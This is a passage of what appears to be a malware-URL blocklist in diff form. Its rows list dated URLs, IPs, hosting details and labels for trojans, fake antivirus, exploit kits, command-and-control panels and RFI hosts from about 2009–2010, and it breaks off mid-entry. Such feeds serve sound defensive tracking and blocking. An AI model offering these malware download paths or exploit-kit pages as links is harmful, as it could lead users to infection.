+"2009/11/15_16:09","www.purplehorses.net/?page=bleach-244-online","69.89.19.200","19-200.bluehost.com.","redirects to Rogue if referer is a search engine","whois@bluehost.com","11798","0","US", +"2009/11/15_16:09","www.wildsap.com/?kkk=bleach-episodes-244","69.89.31.59","box259.bluehost.com.","redirects to Rogue if referer is a search engine","whois@bluehost.com","11798","0","US", +"2009/11/15_16:09","www.ohiomm.com/?page=bleach-244-vosta","74.220.219.67","box467.bluehost.com.","redirects to Rogue if referer is a search engine","jarnold@knightridder.com","11798","0","US", +"2009/11/15_16:09","be-funk.com/?kkk=bleach-244-english-sub","69.89.18.20","box20.bluehost.com.","redirects to Rogue if referer is a search engine","whois@bluehost.com","11798","0","US", +"2009/11/15_16:09","revistaelite.com/?topic=bleach-244-english-sub","69.89.22.116","box116.bluehost.com.","redirects to Rogue if referer is a search engine","whois@bluehost.com","11798","0","US", +"2009/11/15_16:09","www.wrestlingexposed.com/faq.php?t=bleach-244-english-sub","67.20.108.63","67-20-108-63.bluehost.com.","redirects to Rogue if referer is 
a search engine","wrestlingexposed.com / whois@emailaddressprotection.com","11798","0","US", +"2009/11/15_16:09","revistaelite.com/?topic=bleach-244-raw","69.89.22.116","box116.bluehost.com.","redirects to Rogue if referer is a search engine","whois@bluehost.com","11798","0","US", +"2009/11/16_21:00","santacruzsuspension.com/?j=bleach-episode-245","66.96.130.21","21.130.96.66.static.eigbox.net.","redirects to Rogue if referer is a search engine","Santa Cruz Suspension and Accessories / rdandolo@comcast.net","29873","0","US", +"2009/11/24_19:27","-","88.80.10.1/pp/anp.php","-","RFI","-","33837","0","SE", +"2009/12/02_20:32","www.sitepalace.com/w0rmreaper/NoVaC.jpeg","216.45.58.150","-","trojan","jason@jasonscott.com","29761","0","US", +"2009/12/04_19:56","www.doctor-alex.com/files/SetupDrAlex.exe","69.89.20.48","box48.bluehost.com.","Rogue","whois@bluehost.com","11798","0","US", +"2009/12/10_15:48","cznshuya.ivnet.ru/","81.20.97.13","hosting.ivnet.ru.","compromized site loads external script with exploits","Alexey.Vikhrev@vvf.centertelecom.ru","24699","0","RU", +"2009/12/10_15:48","www.tpt.edu.in/","76.163.253.1","-","compromized site loads external script with exploits","-","32392","0","US", +"2009/12/12_10:56","-","218.25.203.5/images/images/js.gif","-","trojan","-","4837","0","CN", +"2009/12/23_02:35","inlinea.co.uk","213.230.203.86","86.0/24.203.230.213.in-addr.arpa.","exploit","in linea ltd / gordon@in-linea.co.uk","33970","0","GB", +"2009/12/23_02:35","inlinea.co.uk/suspended.page/","213.230.203.86","86.0/24.203.230.213.in-addr.arpa.","exploit","in linea ltd / gordon@in-linea.co.uk","33970","0","GB", +"2009/12/23_02:35","inlinea.co.uk/adnep/simple.php","213.230.203.86","86.0/24.203.230.213.in-addr.arpa.","fake av","in linea ltd / gordon@in-linea.co.uk","33970","0","GB", +"2009/12/23_02:35","inlinea.co.uk/adnep/tahitian.php","213.230.203.86","86.0/24.203.230.213.in-addr.arpa.","fake av","in linea ltd / gordon@in-linea.co.uk","33970","0","GB", 
+"2014/01/22_22:22","downloads-whatsapp.com/whatsapp-for-samsung.php","91.218.229.16","h7.ihc.ru.","Android/Trojan.SMS.FakeInst","-","48172","0","RU", +"2010/02/01_11:14","websalesusa.com/ken","208.112.22.66","-","RFI","CvAP / psugarman@websalesusa.com","20021","0","US", +"2010/02/02_08:40","www.rempko.sk/kontakt.htm","213.81.152.60","wep.t-com.sk.","compromised site directs to exploits","-","6855","0","SK", +"2010/02/10_11:39","www.secondome.com/sora-margherita/","69.163.145.107","apache2-moon.suns.dreamhost.com.","obfuscated iframe directs to exploit kit","secondome.com@proxy.dreamhost.com","26347","0","US", +"2010/02/13_09:21","reishus.de/.sys/?action=fbgen&mode=s&age=193&a=-186345958&v=82&crc=669&ie=6.0.2900.2180","212.12.112.25","web-ve-gamma.domainmedia.net.","Koobface","hostmaster.no@spam.expressmedia.de","12595","0","DE", +"2010/02/13_09:21","sexzoznamka.eu/lightbox/js/r/files/tasks/AC","87.236.199.153","boom.barad.cz.","returns malware url base64 encoded","-","35592","0","CZ", +"2010/02/14_15:14","-","119.145.143.6/aspnet_client/system_web/update.exe","-","trojan Redosdru","-","4134","0","CN", +"2010/02/17_15:39","-","66.220.17.157/toolbar_uninstall.exe","157.17.220.66.in-addr.arpa","Trojan.Obfuscated.BX / Lop / Swizzor","-","6939","0","US", +"2010/02/17_15:39","-","89.28.13.212/in.php?s=89.28.13.214","89-28-13-212.starnet.md","redirects to fake av","-","31252","0","MD", +"2010/02/25_21:26","a.update.51edm.net/20100223/01.kdg?md5=ab2676ca2190bc21abcba6e5f5b3b2a7","222.222.204.68","-","trojan","ktone123@sohu.com","4134","0","CN", +"2010/02/26_16:28","-","77.245.61.232/offersfortoday/get_file.php","afleet15.amsnl.webair.com.","redirects to trojan","-","36057","0","NL", +"2010/02/26_16:30","-","77.245.61.232/offersfortoday/multi/28.exe","afleet15.amsnl.webair.com.","trojan","-","36057","0","NL", +"2010/03/09_12:04","bravetools.net/en/mytools.php","74.54.41.82","gator326.hostgator.com.","exploit kit","Amir Hossein Jadidi / 
domian@parandis.com","21844","0","US", +"2010/03/17_04:53","-","83.139.194.168/images/comprovanteEmail_Html.com","-","Trojan","-","33942","0","IT", +"2010/03/17_15:54","vette-porno.nl","213.132.197.60","webguru104.webguru.nl.","obfuscated iframe directs to exploit kit","-","24793","0","NL", +"2010/03/24_11:51","-","58.55.127.16:8080/files/image.jpg","-","Backdoor Koutodoor","-","4134","0","CN", +"2010/03/29_06:18","obkom.net.ua/bancodes/rotator.php?place=indexfoot","193.178.146.235","obkom.net.ua.","iframe directs to redirector/exploits","info@imena.com.ua 20051201","28907","0","UA", +"2010/04/01_16:14","wkmg.co.kr/bbs/lib/1.txt","218.38.243.71","-","RFI","lc1005@naver.com","17845","0","KR", +"2010/04/03_10:04","-","91.207.6.134/spm/page.php?id=1378328&tick=1378328&ver=100&smtp=ok&task=0","134.6.207.91.unknown.SteepHost.Net.","-","-","47142","0","CZ", +"2010/04/07_06:26","blacknite.eu/cracking/Pelite.EXE","89.234.64.135","web3.hosting.digiweb.ie.","trojan","-","31122","0","IE", +"2010/04/07_14:26","-","78.140.15.82/protod.exe","-","backdoor","-","31357","0","RU", +"2010/04/08_15:26","-","202.38.97.217/manual/readme.txt","-","trojan","-","4538","0","CN", +"2010/04/08_15:26","bargainracks.co.uk/img/common/1x2.gif","77.75.105.9","-","trojan","-","39326","0","GB", +"2010/04/10_09:07","-","62.75.152.79/MeinEigenerServer/index.php?p=Login","vs152079.vserver.de.","control panel of Warbot","-","8972","0","DE", +"2010/04/12_11:29","-","95.143.193.60/dir/gate.php?box=war&take=0&uid=pecwghrc","-","trojan Peerfit","-","49770","0","SE", +"2010/04/12_20:14","-","193.86.3.170/region/karneva2003-2/karneval2003-2.html","ns3.oku-zn.cz.","obfuscated iframe directs to exploit kit","-","2819","0","CZ", +"2010/04/14_05:32","-","78.140.15.82/bootstrap","-","Gootkit","-","31357","0","RU", +"2010/04/16_20:16","pokachi.net/","77.222.40.91","varna.sweb.ru.","compromised site directs to exploits","-","44112","0","RU", 
+"2010/04/16_20:16","pride-u-bike.com/2006/09/30/akkymtlator/","206.225.20.77","-","compromised site directs to exploits","-","6428","0","US", +"2010/04/16_20:16","pride-u-bike.com/2007/06/23/s-tolkacha/","206.225.20.77","-","compromised site directs to exploits","-","6428","0","US", +"2010/04/16_20:16","pride-u-bike.com/2007/07/30/doroga-smerti/","206.225.20.77","-","compromised site directs to exploits","-","6428","0","US", +"2010/04/16_20:16","pride-u-bike.com/byzapimoto/","206.225.20.77","-","compromised site directs to exploits","-","6428","0","US", +"2010/04/16_20:16","pride-u-bike.com/motorcycle/suzuki-motorcycle/","206.225.20.77","-","compromised site directs to exploits","-","6428","0","US", +"2010/04/16_20:16","pride-u-bike.com/motorcycle/vozdeniye-motorcycle/","206.225.20.77","-","compromised site directs to exploits","-","6428","0","US", +"2010/04/16_20:16","pride-u-bike.com/sell/honda-steed-400-1996/","206.225.20.77","-","compromised site directs to exploits","-","6428","0","US", +"2010/04/16_20:16","pride-u-bike.com/sell/honda-vfr400r-nc30/","206.225.20.77","-","compromised site directs to exploits","-","6428","0","US", +"2010/04/16_20:16","quotidiennokoue.com/","66.7.214.152","pass81.dizinc.com.","compromised site directs to exploits","-","33182","0","US", +"2010/04/16_20:16","quotidiennokoue.com/?cat=5","66.7.214.152","pass81.dizinc.com.","compromised site directs to exploits","-","33182","0","US", +"2010/04/16_20:16","quotidiennokoue.com/?p=558","66.7.214.152","pass81.dizinc.com.","compromised site directs to exploits","-","33182","0","US", +"2010/04/16_20:16","safety.amw.com/family/ask-john-walsh-how-can-i-tell-if-a-child-has-been-abused/","4.59.56.18","-","compromised site directs to exploits","-","3356","0","US", +"2010/04/16_20:16","safety.amw.com/home/stop-domestic-violence-before-it-starts/","4.59.56.18","-","compromised site directs to exploits","-","3356","0","US", 
+"2010/04/16_20:16","wmserver.net/sgcg/?page_id=5","217.30.180.48","virtual22.nebula.fi.","compromised site directs to exploits","-","29422","0","FI", +"2010/04/16_20:16","wp9.ru/","188.127.248.54","5.mirit.su.","compromised site directs to exploits","-","48172","0","RU", +"2010/04/16_20:16","www.sanseracingteam.com/wordpress/","85.10.140.251","wpc4811.host7x24.com.","compromised site directs to exploits","-","48185","0","FR", +"2010/04/16_20:16","www.sanseracingteam.com/wordpress/?p=128","85.10.140.251","wpc4811.host7x24.com.","compromised site directs to exploits","-","48185","0","FR", +"2010/04/16_20:16","www.sonnoli.com/?page_id=5","62.149.140.107","webx97.aruba.it.","compromised site directs to exploits","-","31034","0","IT", +"2010/04/16_20:16","www.stirparts.ru/","89.108.67.238","cp141.agava.net.","compromised site directs to exploits","-","43146","0","RU", +"2010/04/16_20:16","www.tiergestuetzt.de/","80.190.144.115","sv05.net-housting.de.","compromised site directs to exploits","-","15598","0","DE", +"2010/04/17_23:47","-","78.140.15.82/quu3aiVai7Lei6epha7azoYegah4da9za2rec8ahngoosu7tuneemoizee5vael5eBoazahHephaahohTa3eecoochaiseesheichoh7aikuz0uas8zeekiaChiayeVa/scripts/tasks.xml","-","Gootkit","-","31357","0","RU", +"2010/04/20_10:45","pic.starsarabian.com/","98.130.32.2","rev.opentransfer.com.2.32.130.98.in-addr.arpa.","obfuscated iframe directs to exploits","IX Webhosting / info@ixwebhosting.com","32392","0","US", +"2010/04/20_16:20","www.angolotesti.it/J/testi_canzoni_jovanotti_168/testo_canzone_chissa_se_stai_dormendo_9566.html","174.122.221.186","ba.dd.7aae.static.theplanet.com.","obfuscated iframe directs to exploits","-","21844","0","US", +"2010/04/25_06:54","w612.nb.host127-0-0-1.com/bins/int/kr3_znp.int?fxp=384bd820008ee37f030b3e65bca6e8a1a65beab33574f567a23b0a987ca83e6544e3e645","66.220.17.200","-","trojan Swizzor","Contactprivacy.com / hostcom@contactprivacy.com","6939","0","US", 
+"2010/04/25_06:54","q28840.nb.host127-0-0-1.com/bins/int/tp_map16.int?fxp=5936289861f351e362768cf97e7b45e0648647f26c6d6750fb2298af91238cf9c815a461","66.220.17.200","-","trojan Swizzor","Contactprivacy.com / hostcom@contactprivacy.com","6939","0","US", +"2010/04/27_06:45","w4988.nb.host127-0-0-1.com/bins/int/np_pkz.int?affid=NP_0104&fxp=85c26940bd074d9ebe8290842bca496331374b71c3b8806954f77f9","66.220.17.200","-","trojan Swizzor","Contactprivacy.com / hostcom@contactprivacy.com","6939","0","US", +"2010/04/27_06:45","z32538.nb.host127-0-0-1.com/bins/int/np_pkz.int?affid=NP_0104&fxp=2ac11c971204a16811817c725e04d68a44f9d4987c472f66eb08d0","66.220.17.200","-","trojan Swizzor","Contactprivacy.com / hostcom@contactprivacy.com","6939","0","US", +"2010/05/07_06:52","-","62.122.75.237/","-","Rogue AV","-","5577","0","UA", +"2010/05/08_11:02","-","116.127.121.27/~brownsoftdown/download/servprodect27.exe","-","trojan","-","9318","0","KR", +"2010/05/09_19:02","-","193.105.174.42/stat/halo-i16/o.php","-","malware calls home","-","196954","0","UA", +"2010/05/09_19:02","-","193.105.174.42/stat/halo-i16/s.php","-","malware calls home","-","196954","0","UA", +"2010/05/09_19:02","-","193.105.174.42/stat/halo-i5/s.php","-","malware calls home","-","196954","0","UA", +"2010/05/09_19:02","-","193.105.174.42/stat/halo-i5/l.php","-","malware calls home","-","196954","0","UA", +"2010/05/13_10:04","-","188.65.74.166","-","fake av","-","42473","0","AT", +"2010/05/13_10:04","-","188.65.74.167","-","fake av","-","42473","0","AT", +"2010/05/13_10:04","-","188.65.74.168","-","fake av","-","42473","0","AT", +"2010/05/13_10:04","-","188.65.74.169","-","fake av","-","42473","0","AT", +"2010/05/13_10:04","-","188.65.74.170","-","fake av","-","42473","0","AT", +"2010/05/13_10:04","afa15.com.ne.kr/media/videoxxx.avi.exe","211.119.245.140","-","fake av","-","3786","0","KR", +"2010/05/15_21:10","-","193.105.207.21/ccc/dede.qwas","-","-","-","50793","0","CZ", 
+"2010/05/15_21:10","-","193.105.207.21/dede/gate.php","-","-","-","50793","0","CZ", +"2013/08/07_19:06","rsiuk.co.uk/cinch/index.html","78.129.255.46","-","Leads to exploit","Barrie Lynch / -","20860","0","GB", +"2013/08/07_19:06","-","54.248.126.242/ruggedly/copernican.js","ec2-54-248-126-242.ap-northeast-1.compute.amazonaws.com.","Leads to exploit","-","16509","0","US", +"2010/05/26_18:24","-","83.133.125.178/r.php?type=0","srv45.cyberhost.name.","returns malware url","-","13237","0","EU", +"2010/06/01_18:58","-","213.252.116.180:81/roundcubemail/bin/1.gif","213.252.116.180.clients.rmt.ru.","RFI","-","5523","0","RU", +"2010/06/30_19:51","-","72.18.206.103/nervoso/download01.rar","ns2.amigoxeternamente.com.","trojan Banker","-","26277","0","US", +"2010/06/30_19:51","-","72.18.206.103/nervoso/download02.rar","ns2.amigoxeternamente.com.","trojan Banker","-","26277","0","US", +"2010/06/30_19:51","-","72.18.206.103/nervoso/download03.rar","ns2.amigoxeternamente.com.","trojan Banker","-","26277","0","US", +"2010/07/10_07:57","fgawegwr.chez.com/images/1273471091.exe","212.27.63.127","perso127-g5.free.fr.","trojan TDSS","Owner hostmaster@proxad.net","12322","0","FR", +"2010/07/13_12:51","-","91.188.60.5/hit.php?v=44&app_type_id=1&wm_id=acc0044&u=d6c9b08c-89d3-46bf-b610-08c742b7ebf2&t=2","-","malware calls home","-","6851","0","LV", +"2010/07/14_18:02","montezuma.spb.ru/key/72548.htm","91.195.110.99","91-195-110-99.hmrtelecom.ru.","fake crack site directs to trojan","ru-ncc@nic.ru","43671","0","RU", +"2010/07/14_20:45","freeserials.ws/sn/64850.html","91.195.110.99","91-195-110-99.hmrtelecom.ru.","fake crack site directs to trojan","none / Use registrar whois listed below","43671","0","RU", +"2010/07/17_20:20","allxscan.tk/ddt/load.php?f=1&e=4","217.119.57.22","bvtk02.synserver.de.","trojan downloader","abuse@dot.tk","31100","0","DE", +"2010/07/17_20:53","-","193.105.240.59/optima/index.php?uid=080286&ver=6g%20XP","-","malware calls home, returns base64 encoded url 
list","-","43513","0","LV", +"2010/07/19_21:04","-","91.188.60.5/hit.php?v=45&app_type_id=1&wm_id=acc0049&u=28b6d4a0-f30b-43bc-8cc8-c466a4ca72bc&t=2","-","malware calls home","-","6851","0","LV", +"2010/07/21_01:11","-","219.255.13.77:8080/Home/exemple.com/","-","exploit","-","9318","0","KR", +"2010/07/21_01:11","-","219.255.13.77:8080/Home/exemple.com/api.php","-","exploit","-","9318","0","KR", +"2010/07/21_01:11","-","219.255.13.77:8080/Home/exemple.com/992.jar","-","Java exploit","-","9318","0","KR", +"2010/07/21_01:11","-","219.255.13.77:8080/Home/exemple.com/cbe.jar","-","Java exploit","-","9318","0","KR", +"2010/07/21_01:11","-","219.255.13.77:8080/Home/exemple.com/error.js.php","-","exploit","-","9318","0","KR", +"2010/07/21_01:11","-","219.255.13.77:8080/Home/exemple.com/gogol.Familie.class","-","exploit","-","9318","0","KR", +"2010/07/21_01:11","-","219.255.13.77:8080/Home/exemple.com/MyName","-","exploit","-","9318","0","KR", +"2010/07/22_14:56","-","91.212.226.33/qkl4Cix7f4XUCs8MTQ1fGRvd25sb2FkfA==18k.gif","-","backdoor SdBot","-","5577","0","CZ", +"2010/07/23_08:01","-","91.188.60.5/hit.php?v=46&app_type_id=1&wm_id=acc0047&u=6a397086-fc8c-4e4e-bd44-05f8f376ab0f&t=2","-","malware calls home","-","6851","0","LV", +"2010/07/23_08:01","-","91.188.60.5/l.php?wm_id=acc0047","-","trojan downloader","-","6851","0","LV", +"2010/07/24_11:27","-","188.65.74.161/wrath_ehgoihgwpigpehh.exe","-","trojan","-","42473","0","AT", +"2010/07/25_17:24","-","91.188.59.10/opapa.exe","-","trojan","-","6851","0","LV", +"2010/07/28_14:08","pornstarss.tk/ntk/index.php?ID=105828","217.119.57.22","bvtk02.synserver.de.","exploit kit","buse@dot.tk","31100","0","DE", +"2010/07/29_13:45","-","85.21.235.231/psd/index.html","85-21-235-231.dar-ekspo.corbina.ru.","obfuscated script / java downloader","-","8402","0","RU", +"2010/08/01_10:11","-","188.65.74.161/varag_sdfgkwlkgadfshn.exe","-","trojan","-","42473","0","AT", 
+"2010/08/10_09:17","-","69.50.221.190/l1/bb.php?v=200&id=554905388&b=9468674099&tm=3","-","Oficla/Sasfis C&C","-","18866","0","US", +"2010/08/11_14:26","-","193.104.146.12:443","-","malware calls home over SSL","-","50134","0","CZ", +"2010/08/11_19:28","-","188.65.74.161/netpoint_ghlaerggweqa.exe","-","fake av","-","42473","0","AT", +"2010/08/12_12:51","-","69.50.221.190/l1/bb.php?v=200&id=636608811&b=9468674099&tm=2","-","-","-","18866","0","US", +"2010/08/13_18:44","-","202.109.143.16:81/ma.exe","-","PWS:Win32/Frethog.gen!G","-","4134","0","CN", +"2010/08/18_14:45","-","188.65.74.161/archi_orweihaorgaigph.exe","-","trojan","-","42473","0","AT", +"2010/08/20_09:37","-","87.118.88.140/pizda/show.php","ns.server.leo-host.ru.","Siberia exploit pack","-","31103","0","DE", +"2010/08/20_09:37","-","87.118.88.140/pizda/stat.php","ns.server.leo-host.ru.","control panel of Siberia exploit pack","-","31103","0","DE", +"2010/08/20_09:37","-","87.118.88.140/pizda/exe.php?spl=HCP","ns.server.leo-host.ru.","trojan","-","31103","0","DE", +"2010/08/21_19:01","-","91.188.59.150/show.php?s=bc0915c6c2","-","Incognito exploit kit","-","6851","0","LV", +"2010/08/21_19:01","-","91.188.59.150/admin.php","-","control panel of Incognito exploit kit","-","6851","0","LV", +"2010/08/21_19:01","-","91.188.59.150/load.php?e=2","-","fake av","-","6851","0","LV", +"2010/08/22_08:38","helesouurusa.cjb.com/land/video.php?l=4:52&id=1&n=my_loli2&a=mike&path=./tmb/my_loli2/31.jpg&rat=./img/rating5.jpg&v=61545","216.194.70.11","redirect.cjb.net.","redirects to trojan TDSS","CJB Management, Inc. / cjb@cjbmanagement.com","13911","0","CA", +"2010/08/22_08:38","helesouurusa.cjb.com/land/?n=my_loli2&id=1","216.194.70.11","redirect.cjb.net.","redirects to trojan TDSS","CJB Management, Inc. 
/ cjb@cjbmanagement.com","13911","0","CA", +"2010/08/23_20:18","-","69.50.221.196/x22/load/load.exe","-","fake av","-","18866","0","US", +"2010/08/23_20:18","-","69.50.221.196/x33/load/load.exe","-","trojan","-","18866","0","US", +"2010/08/23_20:18","-","69.50.221.196/x44/load/load.exe","-","fake av","-","18866","0","US", +"2010/08/23_20:18","-","69.50.221.196/x55/load/load.exe","-","fake av","-","18866","0","US", +"2010/08/26_16:20","-","91.188.59.10/exe/sweater.exe","-","fake av","-","6851","0","LV", +"2010/08/26_16:20","-","91.188.59.10/exe/dogma.exe","-","trojan TDSS","-","6851","0","LV", +"2010/08/26_16:20","-","91.188.59.10/report/log.php","-","malware calls home","-","6851","0","LV", +"2010/08/26_17:01","luwyou.com/photos.php","208.87.149.250","-","trojan Yimfoca","luwyou / martavalverde12@ymail.com","40634","0","US", +"2010/08/30_18:49","-","61.147.75.89/index.php?open=1&myid=14c7c6847c09807.44463926","-","malware calls home","-","23650","0","CN", +"2010/08/30_18:49","-","112.84.189.89/mks.exe","-","TrojanDownloader:Win32/Doneltart.gen","-","4837","0","CN", +"2010/09/05_12:09","-","208.79.232.46:8444/exemple.com/load.php?spl=mdac","host.hotmommagossip.com.","trojan","-","19066","0","US", +"2010/09/05_12:09","-","212.117.161.31/js/","ip-212-117-161-31.server.lu.","exploit kit","-","5577","0","LU", +"2010/09/05_12:09","-","212.117.161.31/js/fi_4.php","ip-212-117-161-31.server.lu.","trojan TDSS","-","5577","0","LU", +"2010/09/07_20:34","-","188.65.74.162/test_severyan_sdhkjwg.exe","-","trojan","-","42473","0","AT", +"2010/09/09_17:06","-","188.65.74.162/invisible_eorighroeig.exe","-","fake av","-","42473","0","AT", +"2010/09/09_19:49","-","91.211.117.25/sp/admin/bin/upload/gbotout.exe","-","trojan","-","48587","0","UA", +"2010/09/09_19:49","-","91.211.117.25/sp/admin/bin/upload/out.exe","-","trojan","-","48587","0","UA", +"2010/09/09_19:49","-","91.211.117.25/sp/admin/bin/upload/out1.exe","-","trojan","-","48587","0","UA", 
+"2010/09/09_19:49","-","91.211.117.25/sp/admin/bin/upload/pedoout.exe","-","trojan","-","48587","0","UA", +"2010/09/12_10:10","-","188.65.74.162/fuckemall_dfljgsdhfog.exe","-","fake av","-","42473","0","AT", +"2010/09/12_10:10","-","194.28.112.3/outlook.exe","-","trojan","-","48691","0","MD", +"2010/09/15_17:18","update.onescan.co.kr/setupa/onescansetup.exe","115.68.13.152","-","fake av","å : ijong1255@nate.com","38700","0","KR", +"2010/09/15_21:29","-","94.100.25.139/np/index.php","139.25.100.94.king-servers.com.","CRiMEPACK","-","35017","0","PL", +"2010/09/15_21:29","-","94.100.25.139/np/admin.php","139.25.100.94.king-servers.com.","control panel of CRiMEPACK","-","35017","0","PL", +"2010/09/15_21:29","-","94.100.25.139/np/load.php?spl=hcp&b=ff&o=xp&i=hcp","139.25.100.94.king-servers.com.","trojan Oficla/Sasfis","-","35017","0","PL", +"2010/09/16_18:37","-","89.248.111.226/page/contacts","-","exploit kit","-","45001","0","ES", +"2010/09/16_18:37","-","89.248.111.226/page/b6609413801fe046af0a9bd9dff148af.php?site=12&name=47942584"e=contacts&","-","trojan","-","45001","0","ES", +"2010/09/19_09:45","sudcom.org/tmp/source/index.php","81.31.145.112","da45.joomlahost.it.","control panel of Eleonore Exploits pack v1.4.1","contactprivacy.com / sudcom.org@contactprivacy.com","47242","0","IT", +"2010/09/19_09:45","sudcom.org/tmp/source/pdf.php","81.31.145.112","da45.joomlahost.it.","pdf exploit","contactprivacy.com / sudcom.org@contactprivacy.com","47242","0","IT", +"2010/09/22_19:04","-","178.17.163.108/ez/","178-17-163-108.static-host.net.","exploit kit","-","43289","0","MD", +"2010/09/22_19:04","-","178.17.163.108/ez/stats.php","178-17-163-108.static-host.net.","control panel of exploit kit","-","43289","0","MD", +"2010/09/22_19:04","-","178.17.163.108/ez/load.php?f=1&e=0","178-17-163-108.static-host.net.","trojan","-","43289","0","MD", +"2010/09/28_18:49","-","70.86.83.194/~unix/PLUGIN/Install-TvFlashPlayer.exe","server1.ddf.com.br.","trojan","-","21844","0","US", 
+"2010/10/06_07:08","-","188.65.74.163/vlx777_sdhgjklaogreah.exe","-","fake av","-","42473","0","AT", +"2010/10/06_20:13","-","178.63.2.21/www/delivery/ajs.php?zoneid=4&cb=52206126077","static.21.2.63.178.clients.your-server.de.","iframe directs to exploit kits","-","24940","0","DE", +"2010/10/07_07:10","scdsfdfgdr12.tk/go/?afid=51","217.119.57.22","bvtk02.synserver.de.","fake av","abuse@dot.tk","31100","0","DE", +"2010/10/07_08:41","-","69.64.50.78/kmxqildtbnangvd.php","vds104.entdev.org.","Phoenix exploit kit","-","30083","0","US", +"2010/10/10_11:05","-","69.64.50.78/foj.php?i=15","vds104.entdev.org.","trojandownloader Vilsel","-","30083","0","US", +"2010/10/10_21:10","scaner-do.tk/go/?afid=51","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","fake av","abuse@dot.tk","32613","0","CA", +"2010/10/12_06:40","scaner-file.tk/go/?afid=51","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","fake av","abuse@dot.tk","32613","0","CA", +"2010/10/12_06:40","scaner-figy.tk/go/?afid=51","217.119.57.22","bvtk02.synserver.de.","fake av","abuse@dot.tk","31100","0","DE", +"2010/10/16_06:28","ns2ns1.tk/test/index.php","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","exploit kit","abuse@dot.tk","32613","0","CA", +"2010/10/16_06:28","ns2ns1.tk/test/load.php?f=1&e=2","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","trojan","abuse@dot.tk","32613","0","CA", +"2010/10/18_09:54","-","83.133.122.54/r.php?type=0","srv243.cyberhost.name.","return malware url","-","13237","0","EU", +"2010/10/19_19:22","-","195.226.197.49/spl_6/bn8.php?i=15","-","trojan","-","51303","0","UA", +"2010/10/22_06:27","-","109.196.143.135/outlook.exe","-","trojan","-","39150","0","UA", +"2010/10/22_22:17","scaner-or.tk/go/?afid=51","217.119.57.22","bvtk02.synserver.de.","fake av","abuse@dot.tk","31100","0","DE", +"2010/10/23_14:38","-","188.65.74.163/cash2_rwhoajdtyjtyysd.exe","-","fake av","-","42473","0","AT", 
+"2010/10/26_18:45","-","195.226.197.50/spl_3/dzf.php?i=15","-","trojan","-","51303","0","UA", +"2010/10/26_18:45","exsexytop.tk/www/index.php","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","exploit kit","abuse@dot.tk","32613","0","CA", +"2010/10/26_18:45","exsexytop.tk/www/load.php?f=1&e=2","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","fake av","abuse@dot.tk","32613","0","CA", +"2010/10/28_17:28","-","109.196.143.133/1.exe","-","trojan Bredolab","-","39150","0","UA", +"2010/10/28_17:28","-","109.196.143.133/bm/","-","Bredolab C&C","-","39150","0","UA", +"2010/10/29_11:24","scaner-sboom.tk/go/?afid=96","217.119.57.22","bvtk02.synserver.de.","fake av","abuse@dot.tk","31100","0","DE", +"2010/10/29_20:42","scaner-sbite.tk/go/?afid=","217.119.57.22","bvtk02.synserver.de.","fake av","abuse@dot.tk","31100","0","DE", +"2010/10/30_18:23","scaner-tfeed.tk/go/?afid=96","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","fake av","abuse@dot.tk","32613","0","CA", +"2010/11/01_20:08","linkforme.tk/www1/load.php?f=1&e=2","217.119.57.22","bvtk02.synserver.de.","fake av","abuse@dot.tk","31100","0","DE", +"2010/11/01_20:08","linkforme.tk/www1/index.php","217.119.57.22","bvtk02.synserver.de.","Zombie exploitation kit","abuse@dot.tk","31100","0","DE", +"2010/11/02_10:15","scaner-tgame.tk/go/?afid=51","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","fake av","abuse@dot.tk","32613","0","CA", +"2010/11/02_13:07","scaner-sdee.tk/go/?afid=51","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","fake av","-","32613","0","CA", +"2010/11/05_05:08","web-fill.tk/go/?afid=51","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","fake av","abuse@dot.tk","32613","0","CA", +"2010/11/06_11:29","internet-bb.tk/go/?afid=51","217.119.57.22","bvtk02.synserver.de.","fake av","abuse@dot.tk","31100","0","DE", +"2010/11/06_22:45","textsex.tk/str/index.php","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","Zombie exploitation 
kit","abuse@dot.tk","32613","0","CA", +"2010/11/06_22:45","textsex.tk/str/load.php?f=1&e=4","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","trojan","abuse@dot.tk","32613","0","CA", +"2010/11/07_10:30","-","92.60.177.235/iza.php?i=15","grusha-92-60-177-235.hostinghutor.com.","trojan downloader","-","15772","0","UA", +"2010/11/09_19:19","-","193.178.172.60/1.exe","-","anti Trusteer Rapport trojan","-","20564","0","UA", +"2010/11/09_19:33","-","195.226.197.50/spl_4/xt.php?i=15","-","trojan","-","51303","0","UA", +"2010/11/10_18:37","live-dir.tk/go/?afid=51","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","fake av","abuse@dot.tk","32613","0","CA", +"2010/11/12_07:47","-","91.217.249.160/KILL.exe","-","trojan","-","51554","0","UA", +"2010/11/12_18:17","-","69.64.63.220/ar.php?i=15","balder038.server4you.net.","trojan Vilsel","-","30083","0","US", +"2010/11/12_18:17","mbrdot.tk/123/index.php","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","Zombie exploitation kit","abuse@dot.tk","32613","0","CA", +"2010/11/12_18:17","mbrdot.tk/123/load.php?f=1&e=6","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","trojan","abuse@dot.tk","32613","0","CA", +"2010/11/12_18:17","-","69.50.213.106/1/bqe.php?i=15","-","trojan","-","18866","0","US", +"2010/11/13_09:52","www.zyxyfy.com/images/ner.html","61.178.85.177","vip.lz118114.cn.","exploit","460243714@qq.com","4134","0","CN", +"2010/11/13_09:52","-","188.95.159.100/phpbb/image2/cp.php?i=15","-","trojan Oficla/Sasfis","-","51306","0","UA", +"2010/11/13_14:59","-","193.104.146.77/f1_heiught3o2iryhe/2uiew__t/zxconfig.bin","-","-","-","50134","0","CZ", +"2010/11/13_14:59","-","193.104.146.77/f1_heiught3o2iryhe/2uiew__t/up1/bot_up1_144.exe","-","-","-","50134","0","CZ", +"2010/11/14_18:06","-","91.217.162.141/adult/bq.php?i=15","-","trojan downloader","-","51441","0","UA", +"2010/11/14_22:12","sexyster.tk/lo/index.php","217.119.57.22","bvtk02.synserver.de.","Zombie exploitation 
